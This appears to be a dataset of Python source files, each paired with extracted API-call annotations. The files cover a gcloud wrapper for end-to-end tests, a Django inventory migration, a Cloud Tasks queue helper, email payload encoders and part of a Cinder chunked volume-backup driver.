numpy as np\n')]
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import downloads
import json
import os
import e2e
def download_gcloud(version):
now = datetime.datetime.utcnow()
now = now.replace(microsecond=0)
scratch_dir = os.path.join(
e2e.workspace_dir(), "gcloud-scratch-" + now.strftime("%Y%m%d%H%M%s")
)
# We build up symlinks to the downloaded binaries in the bin directory
bin_dir = os.path.join(scratch_dir, "bin")
os.makedirs(bin_dir, exist_ok=True)
url = (
"https://dl.google.com/dl/cloudsdk/channels/rapid/downloads/google-cloud-sdk-"
+ version
+ "-linux-x86_64.tar.gz"
)
tarfile = os.path.join(scratch_dir, "gcloud.tar.gz")
downloads.download_url(url, tarfile) # TODO: hashing?
expanded = downloads.expand_tar(tarfile)
gcloud_path = os.path.join(bin_dir, "gcloud")
os.symlink(os.path.join(expanded, "google-cloud-sdk", "bin", "gcloud"), gcloud_path)
gsutil_path = os.path.join(bin_dir, "gsutil")
os.symlink(os.path.join(expanded, "google-cloud-sdk", "bin", "gsutil"), gsutil_path)
return Gcloud(gcloud_path, gsutil=gsutil_path)
def local_gcloud():
return Gcloud("gcloud", gsutil="gsutil")
class Gcloud(object):
def __init__(self, bin, statedir=None, env=None, gsutil=None):
if env is None:
env = os.environ.copy()
self.bin = os.path.expanduser(bin)
self.env = env
self.statedir = statedir
self.gsutil = gsutil
def __repr__(self):
s = "Gcloud:" + self.bin
return s
    # add_to_path ensures that the gcloud binary is on the provided environment's PATH
def add_to_path(self, env):
d = os.path.dirname(self.bin)
env["PATH"] = d + ":" + env["PATH"]
def download_from_gcs(self, url, dest):
mirror = os.environ.get("GCS_TRUSTED_MIRROR")
if mirror:
print("using GCS_TRUSTED_MIRROR %s" % (mirror))
if not mirror.endswith("/"):
mirror += "/"
url = mirror + url.replace("gs://", "gs/")
args = ["cp", url, dest]
return downloads.exec([self.gsutil] + args, env=self.env).strip()
def current_project(self):
return self.exec(["config", "get-value", "project"])
def set_current_project(self, project):
return self.exec(["config", "set", "project", project])
def describe_project(self, project):
args = ["projects", "describe", project]
return self.exec_and_parse_json(args)
def describe_gke_cluster(self, location, name):
args = ["container", "clusters", "describe", "--zone", location, name]
return self.exec_and_parse_json(args)
def delete_gke_cluster(self, location, name):
args = ["container", "clusters", "delete", "--quiet", "--zone", location, name]
return self.exec(args)
def list_gke_clusters(self):
args = ["container", "clusters", "list"]
return self.exec_and_parse_json(args)
def get_gke_cluster_creds(self, name, location, project):
args = ["container", "clusters", "get-credentials", name, "--zone", location, "--project", project]
return self.exec(args)
def exec(self, args):
return downloads.exec(
[self.bin] + args, cwd=self.statedir, env=self.env
).strip()
def exec_and_parse_json(self, args):
j = downloads.exec(
[self.bin, "--format", "json"] + args, cwd=self.statedir, env=self.env
).strip()
return json.loads(j)
def decrypt_key(self, args):
return self.exec(args)
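# Usage sketch (the version and project strings are illustrative):
#
#     gcloud = download_gcloud("300.0.0")  # or local_gcloud() for the host's install
#     gcloud.set_current_project("my-project")
#     info = gcloud.describe_project("my-project")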
|
[
"os.path.expanduser",
"os.makedirs",
"json.loads",
"os.path.dirname",
"os.environ.copy",
"e2e.workspace_dir",
"downloads.download_url",
"os.environ.get",
"datetime.datetime.utcnow",
"downloads.expand_tar",
"downloads.exec",
"os.path.join"
] |
[((684, 710), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (708, 710), False, 'import datetime\n'), ((955, 987), 'os.path.join', 'os.path.join', (['scratch_dir', '"""bin"""'], {}), "(scratch_dir, 'bin')\n", (967, 987), False, 'import os\n'), ((992, 1027), 'os.makedirs', 'os.makedirs', (['bin_dir'], {'exist_ok': '(True)'}), '(bin_dir, exist_ok=True)\n', (1003, 1027), False, 'import os\n'), ((1199, 1241), 'os.path.join', 'os.path.join', (['scratch_dir', '"""gcloud.tar.gz"""'], {}), "(scratch_dir, 'gcloud.tar.gz')\n", (1211, 1241), False, 'import os\n'), ((1246, 1282), 'downloads.download_url', 'downloads.download_url', (['url', 'tarfile'], {}), '(url, tarfile)\n', (1268, 1282), False, 'import downloads\n'), ((1316, 1345), 'downloads.expand_tar', 'downloads.expand_tar', (['tarfile'], {}), '(tarfile)\n', (1336, 1345), False, 'import downloads\n'), ((1365, 1396), 'os.path.join', 'os.path.join', (['bin_dir', '"""gcloud"""'], {}), "(bin_dir, 'gcloud')\n", (1377, 1396), False, 'import os\n'), ((1505, 1536), 'os.path.join', 'os.path.join', (['bin_dir', '"""gsutil"""'], {}), "(bin_dir, 'gsutil')\n", (1517, 1536), False, 'import os\n'), ((789, 808), 'e2e.workspace_dir', 'e2e.workspace_dir', ([], {}), '()\n', (806, 808), False, 'import e2e\n'), ((1412, 1471), 'os.path.join', 'os.path.join', (['expanded', '"""google-cloud-sdk"""', '"""bin"""', '"""gcloud"""'], {}), "(expanded, 'google-cloud-sdk', 'bin', 'gcloud')\n", (1424, 1471), False, 'import os\n'), ((1552, 1611), 'os.path.join', 'os.path.join', (['expanded', '"""google-cloud-sdk"""', '"""bin"""', '"""gsutil"""'], {}), "(expanded, 'google-cloud-sdk', 'bin', 'gsutil')\n", (1564, 1611), False, 'import os\n'), ((1915, 1938), 'os.path.expanduser', 'os.path.expanduser', (['bin'], {}), '(bin)\n', (1933, 1938), False, 'import os\n'), ((2210, 2235), 'os.path.dirname', 'os.path.dirname', (['self.bin'], {}), '(self.bin)\n', (2225, 2235), False, 'import os\n'), ((2342, 2378), 'os.environ.get', 'os.environ.get', (['"""GCS_TRUSTED_MIRROR"""'], {}), "('GCS_TRUSTED_MIRROR')\n", (2356, 2378), False, 'import os\n'), ((4035, 4048), 'json.loads', 'json.loads', (['j'], {}), '(j)\n', (4045, 4048), False, 'import json\n'), ((1878, 1895), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (1893, 1895), False, 'import os\n'), ((2633, 2683), 'downloads.exec', 'downloads.exec', (['([self.gsutil] + args)'], {'env': 'self.env'}), '([self.gsutil] + args, env=self.env)\n', (2647, 2683), False, 'import downloads\n'), ((3752, 3818), 'downloads.exec', 'downloads.exec', (['([self.bin] + args)'], {'cwd': 'self.statedir', 'env': 'self.env'}), '([self.bin] + args, cwd=self.statedir, env=self.env)\n', (3766, 3818), False, 'import downloads\n'), ((3903, 3993), 'downloads.exec', 'downloads.exec', (["([self.bin, '--format', 'json'] + args)"], {'cwd': 'self.statedir', 'env': 'self.env'}), "([self.bin, '--format', 'json'] + args, cwd=self.statedir,\n env=self.env)\n", (3917, 3993), False, 'import downloads\n')]
|
# Generated by Django 3.1.1 on 2020-09-17 18:40
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Fixture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('owner', models.CharField(max_length=100)),
('date_added', models.DateTimeField(default=django.utils.timezone.now)),
('last_rented', models.DateTimeField(default=None)),
('last_sickbay', models.DateTimeField(default=None)),
('last_service', models.TextField()),
('model', models.CharField(max_length=100)),
('manufacturer', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Hardware',
fields=[
('fixture_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventory.fixture')),
],
bases=('inventory.fixture',),
),
migrations.CreateModel(
name='Projector',
fields=[
('fixture_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='inventory.fixture')),
],
bases=('inventory.fixture',),
),
]
|
[
"django.db.models.TextField",
"django.db.models.OneToOneField",
"django.db.models.CharField",
"django.db.models.AutoField",
"django.db.models.DateTimeField"
] |
[((365, 458), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (381, 458), False, 'from django.db import migrations, models\n'), ((483, 515), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (499, 515), False, 'from django.db import migrations, models\n'), ((549, 604), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (569, 604), False, 'from django.db import migrations, models\n'), ((639, 673), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None'}), '(default=None)\n', (659, 673), False, 'from django.db import migrations, models\n'), ((709, 743), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None'}), '(default=None)\n', (729, 743), False, 'from django.db import migrations, models\n'), ((779, 797), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (795, 797), False, 'from django.db import migrations, models\n'), ((826, 858), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (842, 858), False, 'from django.db import migrations, models\n'), ((894, 926), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (910, 926), False, 'from django.db import migrations, models\n'), ((1069, 1240), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'auto_created': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'parent_link': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'to': '"""inventory.fixture"""'}), "(auto_created=True, on_delete=django.db.models.deletion\n .CASCADE, parent_link=True, primary_key=True, serialize=False, to=\n 'inventory.fixture')\n", (1089, 1240), False, 'from django.db import migrations, models\n'), ((1416, 1587), 'django.db.models.OneToOneField', 'models.OneToOneField', ([], {'auto_created': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'parent_link': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'to': '"""inventory.fixture"""'}), "(auto_created=True, on_delete=django.db.models.deletion\n .CASCADE, parent_link=True, primary_key=True, serialize=False, to=\n 'inventory.fixture')\n", (1436, 1587), False, 'from django.db import migrations, models\n')]
|
import enum
import json
import time
import typing as t
import structlog
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from django.urls import reverse
from google.cloud.tasks_v2 import CloudTasksClient
log = structlog.get_logger()
registry = {}
schedule_registry = {}
class RetryTaskException(Exception):
pass
class TaskResponse(enum.IntEnum):
SUCCESS = 200
RETRY = 429
FAIL = 500
class Task:
client = None
def __init__(self, f, queue: str, should_retry=True):
self.f = f
self.queue = queue
self.should_retry = should_retry
@classmethod
def get_client(cls):
if cls.client is None:
cls.client = CloudTasksClient()
return cls.client
@property
def name(self):
return f"{self.f.__module__}.{self.f.__name__}"
def __str__(self):
return f"<Task {self.name}>"
def __call__(self, *args, **kwargs):
return self.f(*args, **kwargs)
def enqueue(self, *args, **kwargs):
client = self.get_client()
parent = client.queue_path(settings.PROJECT_ID, settings.PROJECT_REGION, self.queue)
body = {
"http_request": {
"http_method": "POST",
"url": f"https://{settings.TASK_DOMAIN}{reverse('task-execute')}",
"oidc_token": {"service_account_email": settings.TASK_SERVICE_ACCOUNT},
"body": json.dumps(
{"function": self.name, "args": args, "kwargs": kwargs}, cls=DjangoJSONEncoder
).encode("utf-8"),
},
}
response = self.get_client().create_task(parent, body)
log.info("tasks.queued", name=self.name, task_id=response.name)
return response
class DebugTask(Task):
def enqueue(self, *args, **kwargs):
# execute all tasks inline
body = json.dumps(
{"function": self.name, "args": args, "kwargs": kwargs}, cls=DjangoJSONEncoder
).encode("utf-8")
body = json.loads(body.decode("utf-8"))
execute_task(body["function"], body["args"], body["kwargs"])
def get_task_class() -> t.Type[Task]:
if settings.DEBUG:
return DebugTask
return Task
def register_task(
should_retry=True, queue=settings.TASK_DEFAULT_QUEUE, schedule=None
) -> t.Union[Task, t.Callable[[t.Callable], Task]]:
def do_register(f, _should_retry, _queue) -> Task:
task = get_task_class()(f, _queue, should_retry=_should_retry)
registry[task.name] = task
if schedule is not None:
schedule_registry[task.name] = schedule
return task
def as_decorator(f) -> Task:
return do_register(f, should_retry, queue)
if callable(should_retry):
# called with @register_task
return do_register(should_retry, True, queue)
return as_decorator
def execute_task(name, args, kwargs) -> TaskResponse:
task = registry.get(name)
if task is None:
log.error("tasks.unknown", name=name)
return TaskResponse.SUCCESS
start = time.time()
log.info("tasks.start", name=name)
try:
task(*args, **kwargs)
log.info("tasks.finish", name=name, time=f"{int((time.time() - start) * 1000)}ms")
return TaskResponse.SUCCESS
except RetryTaskException:
log.info("task.force_retry", name=name)
return TaskResponse.RETRY
except Exception:
log.exception("task.crash", name=name, should_retry=task.should_retry)
if task.should_retry:
return TaskResponse.FAIL
return TaskResponse.SUCCESS
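# Usage sketch (hypothetical task function; the queue name is illustrative):
#
#     @register_task(queue="emails", should_retry=False)
#     def send_welcome_email(user_id):
#         ...
#
#     send_welcome_email.enqueue(42)   # queued via Cloud Tasks, or executed
#                                      # inline by DebugTask when DEBUG is on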
|
[
"json.dumps",
"time.time",
"django.urls.reverse",
"google.cloud.tasks_v2.CloudTasksClient",
"structlog.get_logger"
] |
[((255, 277), 'structlog.get_logger', 'structlog.get_logger', ([], {}), '()\n', (275, 277), False, 'import structlog\n'), ((3092, 3103), 'time.time', 'time.time', ([], {}), '()\n', (3101, 3103), False, 'import time\n'), ((725, 743), 'google.cloud.tasks_v2.CloudTasksClient', 'CloudTasksClient', ([], {}), '()\n', (741, 743), False, 'from google.cloud.tasks_v2 import CloudTasksClient\n'), ((1898, 1993), 'json.dumps', 'json.dumps', (["{'function': self.name, 'args': args, 'kwargs': kwargs}"], {'cls': 'DjangoJSONEncoder'}), "({'function': self.name, 'args': args, 'kwargs': kwargs}, cls=\n DjangoJSONEncoder)\n", (1908, 1993), False, 'import json\n'), ((1314, 1337), 'django.urls.reverse', 'reverse', (['"""task-execute"""'], {}), "('task-execute')\n", (1321, 1337), False, 'from django.urls import reverse\n'), ((1453, 1548), 'json.dumps', 'json.dumps', (["{'function': self.name, 'args': args, 'kwargs': kwargs}"], {'cls': 'DjangoJSONEncoder'}), "({'function': self.name, 'args': args, 'kwargs': kwargs}, cls=\n DjangoJSONEncoder)\n", (1463, 1548), False, 'import json\n'), ((3239, 3250), 'time.time', 'time.time', ([], {}), '()\n', (3248, 3250), False, 'import time\n')]
|
# Copyright (C) 2001 Python Software Foundation
# Author: <EMAIL> (<NAME>)
"""Module containing encoding functions for Image.Image and Text.Text.
"""
import base64
from quopri import encodestring as _encodestring
# Helpers
def _qencode(s):
return _encodestring(s, quotetabs=1)
def _bencode(s):
# We can't quite use base64.encodestring() since it tacks on a "courtesy
# newline". Blech!
if not s:
return s
hasnewline = (s[-1] == '\n')
value = base64.encodestring(s)
if not hasnewline and value[-1] == '\n':
return value[:-1]
return value
def encode_base64(msg):
"""Encode the message's payload in Base64.
Also, add an appropriate Content-Transfer-Encoding: header.
"""
orig = msg.get_payload()
encdata = _bencode(orig)
msg.set_payload(encdata)
msg['Content-Transfer-Encoding'] = 'base64'
def encode_quopri(msg):
"""Encode the message's payload in Quoted-Printable.
Also, add an appropriate Content-Transfer-Encoding: header.
"""
orig = msg.get_payload()
encdata = _qencode(orig)
msg.set_payload(encdata)
msg['Content-Transfer-Encoding'] = 'quoted-printable'
def encode_7or8bit(msg):
"""Set the Content-Transfer-Encoding: header to 7bit or 8bit."""
orig = msg.get_payload()
# We play a trick to make this go fast. If encoding to ASCII succeeds, we
# know the data must be 7bit, otherwise treat it as 8bit.
try:
orig.encode('ascii')
except UnicodeError:
msg['Content-Transfer-Encoding'] = '8bit'
else:
msg['Content-Transfer-Encoding'] = '7bit'
def encode_noop(msg):
"""Do nothing."""
|
[
"base64.encodestring",
"quopri.encodestring"
] |
[((257, 286), 'quopri.encodestring', '_encodestring', (['s'], {'quotetabs': '(1)'}), '(s, quotetabs=1)\n', (270, 286), True, 'from quopri import encodestring as _encodestring\n'), ((483, 505), 'base64.encodestring', 'base64.encodestring', (['s'], {}), '(s)\n', (502, 505), False, 'import base64\n')]
|
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 <NAME> <<EMAIL>>
# Copyright (C) 2015 <NAME> <<EMAIL>>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.openstack.common import loopingcall
from cinder.volume import utils as volume_utils
LOG = logging.getLogger(__name__)
chunkedbackup_service_opts = [
cfg.StrOpt('backup_compression_algorithm',
default='zlib',
help='Compression algorithm (None to disable)'),
]
CONF = cfg.CONF
CONF.register_opts(chunkedbackup_service_opts)
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
"""Abstract chunked backup driver.
Implements common functionality for backup drivers that store volume
data in multiple "chunks" in a backup repository when the size of
the backed up cinder volume exceeds the size of a backup repository
"chunk."
    Provides abstract methods to be implemented in concrete chunking drivers.
"""
DRIVER_VERSION = '1.0.0'
DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
def _get_compressor(self, algorithm):
try:
if algorithm.lower() in ('none', 'off', 'no'):
return None
elif algorithm.lower() in ('zlib', 'gzip'):
import zlib as compressor
return compressor
elif algorithm.lower() in ('bz2', 'bzip2'):
import bz2 as compressor
return compressor
except ImportError:
pass
err = _('unsupported compression algorithm: %s') % algorithm
raise ValueError(err)
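    # e.g. _get_compressor('zlib') returns the zlib module,
    #      _get_compressor('none') returns None, and an unrecognized
    #      name such as 'lzma' raises ValueError.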
def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
backup_default_container, enable_progress_timer,
db_driver=None):
super(ChunkedBackupDriver, self).__init__(context, db_driver)
self.chunk_size_bytes = chunk_size_bytes
self.sha_block_size_bytes = sha_block_size_bytes
self.backup_default_container = backup_default_container
self.enable_progress_timer = enable_progress_timer
self.backup_timer_interval = CONF.backup_timer_interval
self.data_block_num = CONF.backup_object_number_per_notification
self.az = CONF.storage_availability_zone
self.backup_compression_algorithm = CONF.backup_compression_algorithm
self.compressor = \
self._get_compressor(CONF.backup_compression_algorithm)
# To create your own "chunked" backup driver, implement the following
# abstract methods.
@abc.abstractmethod
def put_container(self, container):
"""Create the container if needed. No failure if it pre-exists."""
return
@abc.abstractmethod
def get_container_entries(self, container, prefix):
"""Get container entry names."""
return
@abc.abstractmethod
def get_object_writer(self, container, object_name, extra_metadata=None):
"""Returns a writer object which stores the chunk data in backup repository.
The object returned should be a context handler that can be used
in a "with" context.
"""
return
@abc.abstractmethod
def get_object_reader(self, container, object_name, extra_metadata=None):
"""Returns a reader object for the backed up chunk."""
return
@abc.abstractmethod
def delete_object(self, container, object_name):
"""Delete object from container."""
return
@abc.abstractmethod
def _generate_object_name_prefix(self, backup):
return
@abc.abstractmethod
def update_container_name(self, backup, container):
"""This method exists so that sub-classes can override the container name
as it comes in to the driver in the backup object. Implementations
should return None if no change to the container name is desired.
"""
return
@abc.abstractmethod
def get_extra_metadata(self, backup, volume):
"""This method allows for collection of extra metadata in prepare_backup()
which will be passed to get_object_reader() and get_object_writer().
Subclass extensions can use this extra information to optimize
data transfers. Return a json serializable object.
"""
return
def _create_container(self, context, backup):
backup_id = backup['id']
backup['container'] = self.update_container_name(backup,
backup['container'])
container = backup['container']
LOG.debug('_create_container started, container: %(container)s,'
'backup: %(backup_id)s.',
{'container': container, 'backup_id': backup_id})
if container is None:
container = self.backup_default_container
self.db.backup_update(context, backup_id, {'container': container})
self.put_container(container)
return container
def _generate_object_names(self, backup):
prefix = backup['service_metadata']
object_names = self.get_container_entries(backup['container'], prefix)
LOG.debug('generated object list: %s.', object_names)
return object_names
def _metadata_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_metadata' % object_name
return filename
def _sha256_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_sha256file' % object_name
return filename
def _write_metadata(self, backup, volume_id, container, object_list,
volume_meta, extra_metadata=None):
filename = self._metadata_filename(backup)
LOG.debug('_write_metadata started, container name: %(container)s,'
' metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
metadata = {}
metadata['version'] = self.DRIVER_VERSION
metadata['backup_id'] = backup['id']
metadata['volume_id'] = volume_id
metadata['backup_name'] = backup['display_name']
metadata['backup_description'] = backup['display_description']
metadata['created_at'] = str(backup['created_at'])
metadata['objects'] = object_list
metadata['parent_id'] = backup['parent_id']
metadata['volume_meta'] = volume_meta
if extra_metadata:
metadata['extra_metadata'] = extra_metadata
metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
with self.get_object_writer(container, filename) as writer:
writer.write(metadata_json)
LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
def _write_sha256file(self, backup, volume_id, container, sha256_list):
filename = self._sha256_filename(backup)
LOG.debug('_write_sha256file started, container name: %(container)s,'
' sha256file filename: %(filename)s.',
{'container': container, 'filename': filename})
sha256file = {}
sha256file['version'] = self.DRIVER_VERSION
sha256file['backup_id'] = backup['id']
sha256file['volume_id'] = volume_id
sha256file['backup_name'] = backup['display_name']
sha256file['backup_description'] = backup['display_description']
sha256file['created_at'] = six.text_type(backup['created_at'])
sha256file['chunk_size'] = self.sha_block_size_bytes
sha256file['sha256s'] = sha256_list
sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
with self.get_object_writer(container, filename) as writer:
writer.write(sha256file_json)
LOG.debug('_write_sha256file finished.')
def _read_metadata(self, backup):
container = backup['container']
filename = self._metadata_filename(backup)
LOG.debug('_read_metadata started, container name: %(container)s, '
'metadata filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
metadata_json = reader.read()
metadata = json.loads(metadata_json)
LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
return metadata
def _read_sha256file(self, backup):
container = backup['container']
filename = self._sha256_filename(backup)
LOG.debug('_read_sha256file started, container name: %(container)s, '
'sha256 filename: %(filename)s.',
{'container': container, 'filename': filename})
with self.get_object_reader(container, filename) as reader:
sha256file_json = reader.read()
sha256file = json.loads(sha256file_json)
LOG.debug('_read_sha256file finished (%s).', sha256file)
return sha256file
def _prepare_backup(self, backup):
"""Prepare the backup process and return the backup metadata."""
backup_id = backup['id']
volume_id = backup['volume_id']
volume = self.db.volume_get(self.context, volume_id)
if volume['size'] <= 0:
err = _('volume size %d is invalid.') % volume['size']
raise exception.InvalidVolume(reason=err)
container = self._create_container(self.context, backup)
object_prefix = self._generate_object_name_prefix(backup)
backup['service_metadata'] = object_prefix
self.db.backup_update(self.context, backup_id, {'service_metadata':
object_prefix})
volume_size_bytes = volume['size'] * units.Gi
availability_zone = self.az
LOG.debug('starting backup of volume: %(volume_id)s,'
' volume size: %(volume_size_bytes)d, object names'
' prefix %(object_prefix)s, availability zone:'
' %(availability_zone)s',
{
'volume_id': volume_id,
'volume_size_bytes': volume_size_bytes,
'object_prefix': object_prefix,
'availability_zone': availability_zone,
})
object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
'volume_meta': None}
object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
extra_metadata = self.get_extra_metadata(backup, volume)
if extra_metadata is not None:
object_meta['extra_metadata'] = extra_metadata
return (object_meta, object_sha256, extra_metadata, container,
volume_size_bytes)
def _backup_chunk(self, backup, container, data, data_offset,
object_meta, extra_metadata):
"""Backup data chunk based on the object metadata and offset."""
object_prefix = object_meta['prefix']
object_list = object_meta['list']
object_id = object_meta['id']
object_name = '%s-%05d' % (object_prefix, object_id)
obj = {}
obj[object_name] = {}
obj[object_name]['offset'] = data_offset
obj[object_name]['length'] = len(data)
LOG.debug('reading chunk of data from volume')
if self.compressor is not None:
algorithm = CONF.backup_compression_algorithm.lower()
obj[object_name]['compression'] = algorithm
data_size_bytes = len(data)
data = self.compressor.compress(data)
comp_size_bytes = len(data)
LOG.debug('compressed %(data_size_bytes)d bytes of data '
'to %(comp_size_bytes)d bytes using '
'%(algorithm)s',
{
'data_size_bytes': data_size_bytes,
'comp_size_bytes': comp_size_bytes,
'algorithm': algorithm,
})
else:
LOG.debug('not compressing data')
obj[object_name]['compression'] = 'none'
LOG.debug('About to put_object')
with self.get_object_writer(
container, object_name, extra_metadata=extra_metadata
) as writer:
writer.write(data)
md5 = hashlib.md5(data).hexdigest()
obj[object_name]['md5'] = md5
LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
{'object_name': object_name, 'md5': md5})
object_list.append(obj)
object_id += 1
object_meta['list'] = object_list
object_meta['id'] = object_id
LOG.debug('Calling eventlet.sleep(0)')
eventlet.sleep(0)
def _finalize_backup(self, backup, container, object_meta, object_sha256):
"""Write the backup's metadata to the backup repository."""
object_list = object_meta['list']
object_id = object_meta['id']
volume_meta = object_meta['volume_meta']
sha256_list = object_sha256['sha256s']
extra_metadata = object_meta.get('extra_metadata')
self._write_sha256file(backup,
backup['volume_id'],
container,
sha256_list)
self._write_metadata(backup,
backup['volume_id'],
container,
object_list,
volume_meta,
extra_metadata)
self.db.backup_update(self.context, backup['id'],
{'object_count': object_id})
LOG.debug('backup %s finished.', backup['id'])
def _backup_metadata(self, backup, object_meta):
"""Backup volume metadata.
NOTE(dosaboy): the metadata we are backing up is obtained from a
versioned api so we should not alter it in any way here.
We must also be sure that the service that will perform
the restore is compatible with version used.
"""
json_meta = self.get_metadata(backup['volume_id'])
if not json_meta:
LOG.debug("No volume metadata to backup.")
return
object_meta["volume_meta"] = json_meta
def _send_progress_end(self, context, backup, object_meta):
object_meta['backup_percent'] = 100
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
                                               extra_usage_info=object_meta)
def _send_progress_notification(self, context, backup, object_meta,
total_block_sent_num, total_volume_size):
backup_percent = total_block_sent_num * 100 / total_volume_size
object_meta['backup_percent'] = backup_percent
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
                                               extra_usage_info=object_meta)
def backup(self, backup, volume_file, backup_metadata=True):
"""Backup the given volume.
If backup['parent_id'] is given, then an incremental backup
is performed.
"""
if self.chunk_size_bytes % self.sha_block_size_bytes:
err = _('Chunk size is not multiple of '
'block size for creating hash.')
raise exception.InvalidBackup(reason=err)
# Read the shafile of the parent backup if backup['parent_id']
# is given.
parent_backup_shafile = None
parent_backup = None
if backup['parent_id']:
parent_backup = self.db.backup_get(self.context,
backup['parent_id'])
parent_backup_shafile = self._read_sha256file(parent_backup)
parent_backup_shalist = parent_backup_shafile['sha256s']
if (parent_backup_shafile['chunk_size'] !=
self.sha_block_size_bytes):
err = (_('Hash block size has changed since the last '
'backup. New hash block size: %(new)s. Old hash '
'block size: %(old)s. Do a full backup.')
% {'old': parent_backup_shafile['chunk_size'],
'new': self.sha_block_size_bytes})
raise exception.InvalidBackup(reason=err)
# If the volume size increased since the last backup, fail
# the incremental backup and ask user to do a full backup.
if backup['size'] > parent_backup['size']:
err = _('Volume size increased since the last '
'backup. Do a full backup.')
raise exception.InvalidBackup(reason=err)
(object_meta, object_sha256, extra_metadata, container,
volume_size_bytes) = self._prepare_backup(backup)
counter = 0
total_block_sent_num = 0
# There are two mechanisms to send the progress notification.
# 1. The notifications are periodically sent in a certain interval.
# 2. The notifications are sent after a certain number of chunks.
# Both of them are working simultaneously during the volume backup,
# when swift is taken as the backup backend.
def _notify_progress():
self._send_progress_notification(self.context, backup,
object_meta,
total_block_sent_num,
volume_size_bytes)
timer = loopingcall.FixedIntervalLoopingCall(
_notify_progress)
if self.enable_progress_timer:
timer.start(interval=self.backup_timer_interval)
sha256_list = object_sha256['sha256s']
shaindex = 0
while True:
data_offset = volume_file.tell()
data = volume_file.read(self.chunk_size_bytes)
if data == '':
break
# Calculate new shas with the datablock.
shalist = []
off = 0
datalen = len(data)
while off < datalen:
chunk_start = off
chunk_end = chunk_start + self.sha_block_size_bytes
if chunk_end > datalen:
chunk_end = datalen
chunk = data[chunk_start:chunk_end]
sha = hashlib.sha256(chunk).hexdigest()
shalist.append(sha)
off += self.sha_block_size_bytes
sha256_list.extend(shalist)
# If parent_backup is not None, that means an incremental
# backup will be performed.
if parent_backup:
# Find the extent that needs to be backed up.
extent_off = -1
for idx, sha in enumerate(shalist):
if sha != parent_backup_shalist[shaindex]:
if extent_off == -1:
# Start of new extent.
extent_off = idx * self.sha_block_size_bytes
else:
if extent_off != -1:
# We've reached the end of extent.
extent_end = idx * self.sha_block_size_bytes
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta,
extra_metadata)
extent_off = -1
shaindex += 1
# The last extent extends to the end of data buffer.
if extent_off != -1:
extent_end = datalen
segment = data[extent_off:extent_end]
self._backup_chunk(backup, container, segment,
data_offset + extent_off,
object_meta, extra_metadata)
extent_off = -1
else: # Do a full backup.
self._backup_chunk(backup, container, data, data_offset,
object_meta, extra_metadata)
# Notifications
total_block_sent_num += self.data_block_num
counter += 1
